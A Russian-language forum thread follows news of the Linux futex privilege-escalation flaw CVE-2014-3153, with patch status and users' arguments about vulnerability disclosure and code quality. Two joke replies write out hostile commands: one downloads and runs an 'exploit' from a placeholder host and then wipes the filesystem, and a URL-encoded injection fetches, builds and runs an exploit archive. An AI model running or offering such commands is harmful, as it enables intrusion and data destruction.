The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Я ядре Linux выявлена локальная уязвимость, позволяющая подн..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Я ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от opennews on 06-Июн-14, 10:55 
В ядре Linux выявлена (http://openwall.com/lists/oss-security/2014/06/05/22) уязвимость (CVE-2014-3153), позволяющая локальному пользователю выполнить код с привилегиями ядра. Проблема вызвана ошибкой в реализации подсистемы futex (http://ru.wikipedia.org/wiki/%D0%A4%D1%8...) и позволяет получить контроль над нулевым кольцом защиты (http://ru.wikipedia.org/wiki/%D0%9A%D0%B...) через манипуляции с системным вызовом futex (проявляется при передаче идентичных адресов uaddr и uaddr2).


Проблеме подвержены все актуальные выпуски ядра, включая 2.6.32. При этом проблема может быть использована (http://seclists.org/oss-sec/2014/q2/469) для выхода за пределы типовых изолированных окружений, так как futex используется в pthread-примитиве glibc и доступен для обращения независимо от уровня изоляции.

Обновления пакетов с ядром пока выпущены только для Debian (https://lists.debian.org/debian-security-announce/2014/msg00...) и Ubuntu (http://www.ubuntu.com/usn/usn-2241-1/). Ещё не выпущены обновления для RHEL (https://rhn.redhat.com/errata/rhel-server-6-errata.html), CentOS (http://lists.centos.org/pipermail/centos-announce/2014-June/...), Fedora (https://admin.fedoraproject.org/updates/F20/security), openSUSE (http://lists.opensuse.org/opensuse-security-announce/2014-06/), SUSE (https://www.suse.com/support/update/), Gentoo (http://www.gentoo.org/security/en/index.xml), Slackware (http://www.slackware.com/security/list.php?l=slackware-secur...). Обновления ядра на kernel.org (https://www.kernel.org/) пока не выпущены, но доступен патч (https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux....).

URL: http://openwall.com/lists/oss-security/2014/06/05/22
Новость: http://www.opennet.dev/opennews/art.shtml?num=39944

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


11. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +1 +/
Сообщение от emg81 (ok) on 06-Июн-14, 11:35 
А эксплоит-то есть, чтобы проверить, работает ли оно?
Просто у меня из всей массы "уязвимостей" работала только одна - последняя, связанная с tty write или типа того.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

25. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +1 +/
Сообщение от pavlinux (ok) on 06-Июн-14, 13:33 
Надо замутить... :)
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

100. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от pavlinux (ok) on 07-Июн-14, 14:00 
> Надо замутить... :)

Пля, работает, во срань!!!

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

118. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –1 +/
Сообщение от KASRU email(ok) on 25-Июн-14, 17:30 
>> Надо замутить... :)
> Пля, работает, во срань!!!

Где скачать исходники exploit использующий эту уязвимость?

Ответить | Правка | ^ к родителю #100 | Наверх | Cообщить модератору

119. "В ядре Linux выявлена локальная уязвимость, позволяющая..."  +/
Сообщение от arisu (ok) on 25-Июн-14, 18:18 
ты поменьше павлину верь. вдобавок — ему и сплойтов никаких не надо, с его говнокодом.
Ответить | Правка | ^ к родителю #118 | Наверх | Cообщить модератору

28. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +10 +/
Сообщение от Аноним (??) on 06-Июн-14, 13:38 
А я из 16 000+ зарегистрированных болезней, болел только поносом. Видимо пора закрывать больницы, друзья.
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

30. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 06-Июн-14, 13:59 
Мойте руки перед едой, чо.

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

35. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +4 +/
Сообщение от Archnewbie on 06-Июн-14, 14:13 
Понос - это не болезнь, а следствие ее.
Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

46. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 06-Июн-14, 16:32 
ответная реакция организма
Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

49. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –1 +/
Сообщение от клоун on 06-Июн-14, 16:37 
Понос - состояние, которое может быть вызвано не только болезнью, бестолочи.
Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

53. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +5 +/
Сообщение от Michael Shigorin email(ok) on 06-Июн-14, 17:03 
> Понос - состояние, которое может быть вызвано не только болезнью, бестолочи.

А, так вот в чём Вы толк знаете...

Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

60. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –3 +/
Сообщение от клоун on 06-Июн-14, 17:38 
Включай мозги! Нашёл на свалке просроченные продукты. Приготовил, сразу съел. Думал будет запор, но пронесло.

Симптомом какой болезни является понос и от чего тебя лечить?

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

76. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от nickfaces on 06-Июн-14, 21:41 
ну...от слабоумия... если,конечно, не "жизнь заставила"
Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

79. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –1 +/
Сообщение от SubGun (ok) on 06-Июн-14, 22:42 
> Симптомом какой болезни является понос и от чего тебя лечить?

Дизбактериоз.

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

81. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +1 +/
Сообщение от Ivan (??) on 06-Июн-14, 23:07 
Мда... Простой вопрос: ПОЧЕМУ просроченные продукты вызывают понос? И вдогонку: что такое "болезнь"?
Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

96. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +2 +/
Сообщение от Аноним (??) on 07-Июн-14, 09:38 
> будет запор, но пронесло.

Биологию ты чтоли не учил в своем дворце? Тебе про бактерий не рассказывали? Впрочем, рассказывать одноклеточному про одноклеточных - весьма сомнительное начинание.

> Симптомом какой болезни является понос и от чего тебя лечить?

Боюсь, root cause в виде непроходимой тyпости таки не лечится.

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

105. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от чо on 07-Июн-14, 18:52 
ага. Про экзо и эндотоксины почитай еще.
Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

95. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +3 +/
Сообщение от Аноним (??) on 07-Июн-14, 09:33 
> А, так вот в чём Вы толк знаете...

Да, у него словесный. //off: иногда даже троллинг модератором посетителя - доставляет.

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

102. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –1 +/
Сообщение от Michael Shigorin email(ok) on 07-Июн-14, 14:12 
> Да, у него словесный.

Вообще справедливости ради, баланс чуши/флуда/вбросов к конструктиву, хоть и со своей спецификой, у данного посетителя меняется и это радует.  Потому что пока есть смысл разговаривать, надо всячески стараться разглядеть человека и вытащить его, а не списывать всё в зверьё/насекомых/ботов и прочих унтерменшей.  Проверено в жизни, да и "Крошка Енот" о том же.

Ответить | Правка | ^ к родителю #95 | Наверх | Cообщить модератору

111. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +1 +/
Сообщение от Аноним (??) on 09-Июн-14, 13:47 
> у данного посетителя меняется и это радует.  

Что-то пока не очень заметно :(.

Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

12. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –10 +/
Сообщение от Аноним (??) on 06-Июн-14, 11:37 
Что-то меня ядро Linux начало разочаровывать своими уязвимостями.
Для Fedora 20 вышло обновление ядра.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

29. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +4 +/
Сообщение от Khariton (ok) on 06-Июн-14, 13:45 
Вас разочаровывает тот факт, что нашли дырку еще с времен 2.6.32 или тот факт что если б не нашли, то типа никто и не знал бы и это было лучше?)))
Ошибки есть везде и лучше всего когда их могут залатать сразу а не через полгода или год.
Вот в линукс как раз с реализацией заплаток все более-менее быстро...
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

47. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 06-Июн-14, 16:33 
Разочаровывает, что ядро такое большое сложное немодульное и этого не изменить. (альтернатив на горизонте нету)
Ответить | Правка | ^ к родителю #29 | Наверх | Cообщить модератору

52. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +4 +/
Сообщение от Michael Shigorin email(ok) on 06-Июн-14, 16:51 
> Разочаровывает, что ядро такое большое сложное немодульное

Вы хоть раз в него вообще заглядывали?

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

56. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –1 +/
Сообщение от Аноним (??) on 06-Июн-14, 17:31 
>> Разочаровывает, что ядро такое большое сложное немодульное
> Вы хоть раз в него вообще заглядывали?

Нет, а ты?

Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

72. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +3 +/
Сообщение от Аноним (??) on 06-Июн-14, 21:07 
> Нет, а ты?

Для чего тогда прикидываешься тупым попугаем?

Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

82. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +1 +/
Сообщение от Michael Shigorin email(ok) on 06-Июн-14, 23:24 
>>> Разочаровывает, что ядро такое большое сложное немодульное
>> Вы хоть раз в него вообще заглядывали?
> Нет, а ты?

Да:

--- linux-2.2.5/fs/isofs/inode.c.orig   Tue Dec 29 21:40:35 1998
+++ linux-2.2.5/fs/isofs/inode.c        Mon Jul 19 21:46:48 1999
@@ -286,7 +286,7 @@
        popt->unhide = 'n';
        popt->check = 'u';              /* unset */
        popt->blocksize = 1024;
-       popt->mode = S_IRUGO | S_IXUGO; /* r-x for all.  The disc could
+       popt->mode = S_IRUGO/* | S_IXUGO*/; /* r-x for all.  The disc could
                                           be shared with DOS machines so
                                           virtually anything could be
                                           a valid executable. */
@@ -1096,8 +1096,8 @@
                for(i=0; i< raw_inode->name_len[0]; i++)
                        if(raw_inode->name[i]=='.' || raw_inode->name[i]==';')
                                break;
-               if(i == raw_inode->name_len[0] || raw_inode->name[i] == ';')
-                       inode->i_mode |= S_IXUGO; /* execute permission */
+//             if(i == raw_inode->name_len[0] || raw_inode->name[i] == ';')
+//                     inode->i_mode |= S_IXUGO; /* execute permission */
        }
        inode->i_uid = inode->i_sb->u.isofs_sb.s_uid;
        inode->i_gid = inode->i_sb->u.isofs_sb.s_gid;

Ответить | Правка | ^ к родителю #56 | Наверх | Cообщить модератору

86. "В ядре Linux выявлена локальная уязвимость, позволяющая..."  +1 +/
Сообщение от arisu (ok) on 07-Июн-14, 01:46 
чёрт, буратино был тупой. сколько уж матом на это ругаюсь, а простая мысль взять и починить всё прямо там, где источник — не приходила.
Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

103. "В ядре Linux выявлена локальная уязвимость, позволяющая..."  +/
Сообщение от Michael Shigorin email(ok) on 07-Июн-14, 14:16 
> простая мысль взять и починить всё прямо там, где источник — не приходила.

Так туда ручку для noexec прикрутили где-то в 2.4, если не раньше.  А тогда просто сделал m3u extfs для mc и с учётом актуальности подборок на сидишках с Петровки это был блокер.

Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

62. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –2 +/
Сообщение от Аноним (??) on 06-Июн-14, 17:52 
Да, и был поражен количеством легаси-гoвна, про которое мне пришлось долго, очень долго вспоминать в котором году я видел что-то подобное и видел ли вообще. Пора уже как в дровах на видео, делить код на части и выпихивать все гoвно мамонта в отдельную ветку. И не только в ядре, многие программы грешат этим. Почему из-за полутора некрофилов должны страдать все? Если кто уж так привязан к железкам/технологиям 90-х годов, вот пускай сами и пиляют их в отдельной ветке.
Ответить | Правка | ^ к родителю #52 | Наверх | Cообщить модератору

68. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +3 +/
Сообщение от Deffic on 06-Июн-14, 20:48 
> Да, и был поражен количеством легаси-гoвна, про которое мне пришлось долго, очень
> долго вспоминать в котором году я видел что-то подобное и видел
> ли вообще. Пора уже как в дровах на видео, делить код
> на части и выпихивать все гoвно мамонта в отдельную ветку. И
> не только в ядре, многие программы грешат этим. Почему из-за полутора
> некрофилов должны страдать все? Если кто уж так привязан к железкам/технологиям
> 90-х годов, вот пускай сами и пиляют их в отдельной ветке.

Пострадали только Вы.

Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

77. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 06-Июн-14, 21:48 
Оно и пилится в отдельных ветках по факту, а потом уже мерджится.
Вон у поттеринга такой же способ разработки systemd.
Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

97. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +2 +/
Сообщение от Аноним (??) on 07-Июн-14, 09:40 
> сложное немодульное и этого не изменить.

Попробуй посмотреть как его разрабатывают чтоли, эксперт хренов. Заодно узнай что такое pull request-ы и по каким принципам их делают.

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

31. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 06-Июн-14, 14:01 
Во второй половине двухтысячных в Firefox выявлялось больше уязвимостей, чем в IE. Означает ли это, что качество кода Firefox было ниже? Парадоксально, это означает обратное.
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

38. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –1 +/
Сообщение от клоун on 06-Июн-14, 14:54 
Это ничего не означает.

А измеримое понятие "качество кода" само по себе нуждается в чётком термине, которого не существует.

Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

61. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от none_first (ok) on 06-Июн-14, 17:47 
ну для кого-то может и не существует http://habrahabr.ru/post/220769/
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

98. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 07-Июн-14, 09:41 
> А измеримое понятие "качество кода" само по себе нуждается в чётком термине,
> которого не существует.

Почему же? Количество багов на тысячу строк - очень даже измеримая сущность с вполне четким определением.

Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

99. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Andrey Mitrofanov on 07-Июн-14, 12:51 
>> А измеримое понятие "качество кода" само по себе нуждается
> Почему же? Количество багов на тысячу строк - очень даже измеримая сущность
> с вполне четким определением.

А мифическое "качество кода" не измеряется и не определимо чётко. Попытка подмены не засчитана. Вторая подача?

Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

101. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Michael Shigorin email(ok) on 07-Июн-14, 14:05 
>> А измеримое понятие "качество кода" само по себе нуждается в чётком термине,
>> которого не существует.

Не термине, а определении, но да.

> Почему же? Количество багов на тысячу строк - очень даже измеримая сущность
> с вполне четким определением.

Баг багу рознь.

Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

14. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +5 +/
Сообщение от vitalif (ok) on 06-Июн-14, 11:46 
Хорошо, больше рута для ондроидов. А то когдаа безопасность ДЛЯ пользователя, это хорошо, но вот когда против - лучше решето)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

48. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +2 +/
Сообщение от Сергей (??) on 06-Июн-14, 16:36 
Для пользователя без мозгов ЛЮБАЯ безопасность против.
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

50. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от mr propper 2 on 06-Июн-14, 16:41 
боюсь в андроиде нет фьютексов((
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

78. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +1 +/
Сообщение от Аноним (??) on 06-Июн-14, 21:52 
Да кудаж они делись то. Улетели на метле?))
Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

15. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Нанобот (ok) on 06-Июн-14, 11:50 
как хорошо, что у меня centos5 на серверах
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

17. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +2 +/
Сообщение от Аноним (??) on 06-Июн-14, 12:10 
уязвимость локальная, или у вас локалхосты?
Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

23. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от pavlinux (ok) on 06-Июн-14, 13:28 
$ ssh user@hostname.com
$ wget http://somewhere.com/foo/bar/exploit
$ ./exploit
# rm -rm /*
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

36. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +2 +/
Сообщение от Аноним (??) on 06-Июн-14, 14:35 
http%3A%2F%2Fremotehost.example.com%2F%3Fwget+www.hackers.org%2Fexploit.zip%26%26unzip+-x+exploit.zip%26%26make%26%26make+install%26%26%2Fusr%2Fbin%2Fexploit

мамо, чому я румынскiй вiрус?

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

18. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +1 +/
Сообщение от Андрей (??) on 06-Июн-14, 12:18 
В генте уже поправили.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

33. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 06-Июн-14, 14:10 
в дебе вчера и ссл и ядро приехало
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

45. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 06-Июн-14, 16:30 
Подтверждаю. Даже для бекпортированной 3.14 - linux-image-3.14-0.bpo.1-amd64 amd64 3.14.5-1~bpo70+1
Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

19. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +2 +/
Сообщение от Sergey722 (ok) on 06-Июн-14, 12:20 
Новость позитивная! Если уязвимость не найдена, то это не значит, что её нет, более того это значит только то, что она не найдена хорошими парнями. А найденная уязвимость - это и не уязвимость вовсе!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

20. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –2 +/
Сообщение от lucentcode (ok) on 06-Июн-14, 12:35 
Совершенно верно. Новость позитивная. Баги были есть и будут всегда. Главное что-бы их вовремя находили.
Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

24. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +1 +/
Сообщение от Аноним (??) on 06-Июн-14, 13:32 
>все актуальные выпуски ядра, включая 2.6.32

от 2010 года
>что-бы их вовремя находили.

Да, "вовремя"

Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

41. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –1 +/
Сообщение от umbr (ok) on 06-Июн-14, 15:39 
Больше багов, хороших и разных!
Извините за оффтоп :)
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

21. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –2 +/
Сообщение от Michael Shigorin email(ok) on 06-Июн-14, 13:03 
> А найденная уязвимость - это и не уязвимость вовсе!

Вообще-то найденная уязвимость -- это найденная уязвимость.  Её ещё надо разобрать, заткнуть, проверить на отсутствие регрессий (или их приемлемость, когда вилка), а затем самое интересное: выкатить исправление на местах, где найденная в коде уязвимость остаётся уязвимостью хоста.

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

27. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –3 +/
Сообщение от Аноним (??) on 06-Июн-14, 13:36 
Вы пропустили важный пункт - 3) наказать того кто пропустил уязвимость, потом того кто принял патч с ней в ядро.
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

71. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +1 +/
Сообщение от Ytch (ok) on 06-Июн-14, 21:07 
> наказать того кто пропустил уязвимость, потом того кто принял патч с ней в ядро.

типичный корпоративный путь в пропасть. насмотрелся. надо описывать в деталях к чему приводит и как сказывается на качестве в итоге?

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

94. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 07-Июн-14, 09:32 
> наказать того кто пропустил уязвимость,

Людям свойственно ошибаться. Наказывать человека за то что он человек? Хм, удачи вам в поиске сотрудников в вашу шарагу...

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

32. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –3 +/
Сообщение от Аноним (??) on 06-Июн-14, 14:02 
В альтах уже патч доступен? А в прочем кому они нужны...
Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

43. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +1 +/
Сообщение от boyarsh on 06-Июн-14, 15:51 
Да, конечно доступен.
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

44. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –1 +/
Сообщение от Аноним (??) on 06-Июн-14, 16:18 
И эти самые корпорации, не способные обезопасить ядро собираются улучшать разработку OpenSSL?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

64. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –2 +/
Сообщение от Аноним (??) on 06-Июн-14, 19:16 
Прозвучали различные мнение о том, что лучше. Любой софт "дырявый". Из этого следует, что лучше путь о них никто не знает. Полагаю это самый разумный компромисс. Нельзя устранить все ошибки и довести продукт до идеала. До нужного состояния и не более того. А всяким "кодокопателям" нужно по рукам бить чтобы другие не страдали из за их энтузиазма. И тем более сурово карать за публикацию в открытый доступ. Палка с двумя концами. Хотели как лучше, а вышло как всегда...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

69. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 06-Июн-14, 21:03 
Ты не думал что в твоем комментарии логическое противоречии? Если все ошибки трудно устранить, то с тем же успехом их трудно искать.
Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

84. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  –1 +/
Сообщение от Michael Shigorin email(ok) on 06-Июн-14, 23:36 
> Любой софт "дырявый".

Нет.

> Из этого следует, что лучше путь о них никто не знает.
> Полагаю это самый разумный компромисс.

Нет.

> Нельзя устранить все ошибки и довести продукт до идеала.

Нет.

> А всяким "кодокопателям" нужно по рукам бить чтобы другие не страдали из за их
> энтузиазма. И тем более сурово карать за публикацию в открытый доступ.

Бить палкой по рукам надо тем, кто зря возомнил себя разработчиком.  И по голове -- тем, кто ставит задания и сроки, исходя из функциональности и забив на всё остальное, и тем, кто набирает по принципу "*.*".

PS: не знаю, кто удалил #87 и зачем, но разница c состоянием здоровья принципиальна в силу того, что код копируется, а здоровье -- нет (см. тж. #21).  Переживания понимаю, но bugtraq@ когда-то читал, а full-disclosure@ посматривал и согласиться никак не могу.

Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

106. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 07-Июн-14, 22:48 
>> Нельзя устранить все ошибки и довести продукт до идеала.
> Нет.

Нет

Ответить | Правка | ^ к родителю #84 | Наверх | Cообщить модератору

107. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Michael Shigorin email(ok) on 07-Июн-14, 23:28 
>>> Нельзя устранить все ошибки и довести продукт до идеала.
>> Нет.
> Нет

Нет смысла повторять эхом, тем паче когда примеры известны.

Ответить | Правка | ^ к родителю #106 | Наверх | Cообщить модератору

108. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 09-Июн-14, 01:11 
Примеры в студию, кроме Альта разумеется.
Ответить | Правка | ^ к родителю #107 | Наверх | Cообщить модератору

109. "В ядре Linux выявлена локальная уязвимость, позволяющая..."  +2 +/
Сообщение от arisu (ok) on 09-Июн-14, 05:22 
> Примеры в студию, кроме Альта разумеется.

запросто: TeX.

Ответить | Правка | ^ к родителю #108 | Наверх | Cообщить модератору

113. "В ядре Linux выявлена локальная уязвимость, позволяющая..."  –1 +/
Сообщение от Аноним (??) on 14-Июн-14, 21:56 
> запросто: TeX.

Ага, шикарный пример, которым пользуются целых два с половиной землемера. И на этом список заканчивается. Арису, такой Арису...

Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

114. "В ядре Linux выявлена локальная уязвимость, позволяющая..."  +1 +/
Сообщение от arisu (ok) on 14-Июн-14, 21:59 
ты ошибся сайтом, винфак не здесь.
Ответить | Правка | ^ к родителю #113 | Наверх | Cообщить модератору

115. "В ядре Linux выявлена локальная уязвимость, позволяющая..."  +/
Сообщение от Аноним (??) on 15-Июн-14, 02:08 
> ты ошибся сайтом, винфак не здесь.

Слив засчитан, сиди на солнышке грейся.

Ответить | Правка | ^ к родителю #114 | Наверх | Cообщить модератору

116. "В ядре Linux выявлена локальная уязвимость, позволяющая..."  +1 +/
Сообщение от arisu (ok) on 15-Июн-14, 02:10 
> Слив засчитан

извини, я не знал, что ты — сливной бачок. думал, просто виндоюзер заблудился.

Ответить | Правка | ^ к родителю #115 | Наверх | Cообщить модератору

112. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Michael Shigorin email(ok) on 10-Июн-14, 01:27 
> Примеры в студию, кроме Альта разумеется.

Альт как раз в таком качестве не годится (как и любая известная мне ОС), а отдельные подозрительные на примерность кусочки вроде control(8) погоды всё-таки не делают.  TeX и изделия DJB уже назвали, этого уже достаточно.

Ответить | Правка | ^ к родителю #108 | Наверх | Cообщить модератору

93. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 07-Июн-14, 09:23 
> Любой софт "дырявый".

DJB делом доказал в qmail и djbdns что это не так.

> Из этого следует, что лучше путь о них никто не знает.

Неверный вывод из неверных предпосылок.

> Полагаю это самый разумный компромисс.

Полагаю что это похоже на страусиную тактику: если не вижу опасность, значит ее нет. Но это лишь самообман, не более. Хакеры, спецслужбы и прочие - дыры ищут. И эксплуатируют. Забыв поставить в известность производителя. Поэтому чем прозрачнее процесс тем оперативнее фиксы и меньше интервал времени когда о дыре знают плохие парни и не знают все остальные.

> Нельзя устранить все ошибки и довести продукт до идеала.

Иногда таки можно. Иди сломай djbdns или qmail? Автор штукарь зелени за это помнится давал. Впрочем, штукарь это ерунда: после такого успеха компании желающие нанять тебя как эксперта в области безопасности выстроятся в длинную очередь.

> А всяким "кодокопателям" нужно по рукам бить чтобы другие не страдали

Не получится. Блэкхэты прекрасно умеют делать все анонимано и втихую, так что комар носа не подточит. Вон с ботнетами как: стада ботов вроде есть, а кто за ними стоит - "ищут пожарные, ищет милиция, ищут давно но не могут найти". Иногда конечно показательно мочат кого-то, но если просто посмотреть на трафф в сети - можно заметить что ботов (и ботоводов, соответственно) меньше вовсе не становится.

> Палка с двумя концами. Хотели как лучше, а вышло как всегда...

Есть только 1 способ удавить баги - выловить и починить. Врать о том что их нет - самонае...лово или, того хуже, осознанное очковтирательство.

Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

104. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Michael Shigorin email(ok) on 07-Июн-14, 14:19 
> Есть только 1 способ удавить баги - выловить и починить.

Отнюдь.  И вообще-то пример с DJB и другими сторонниками подхода proactive security -- это как раз иллюстрация обратного: "чисто не там, где убирают, а там, где не гадят".  Хотя для индустрии этот подход и впрямь менее понятен -- потому как нужны высококлассные специалисты, а не взаимозаменяемые "менеджеры безопасности" (не в упрёк высококлассным специалистам среди менеджеров, ну да они и так поймут, даже если наткнутся на эти слова).

Ответить | Правка | ^ к родителю #93 | Наверх | Cообщить модератору

121. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."  +/
Сообщение от Аноним (??) on 25-Июн-14, 19:27 
> Отнюдь.  И вообще-то пример с DJB и другими сторонниками подхода proactive
> security -- это как раз иллюстрация обратного:

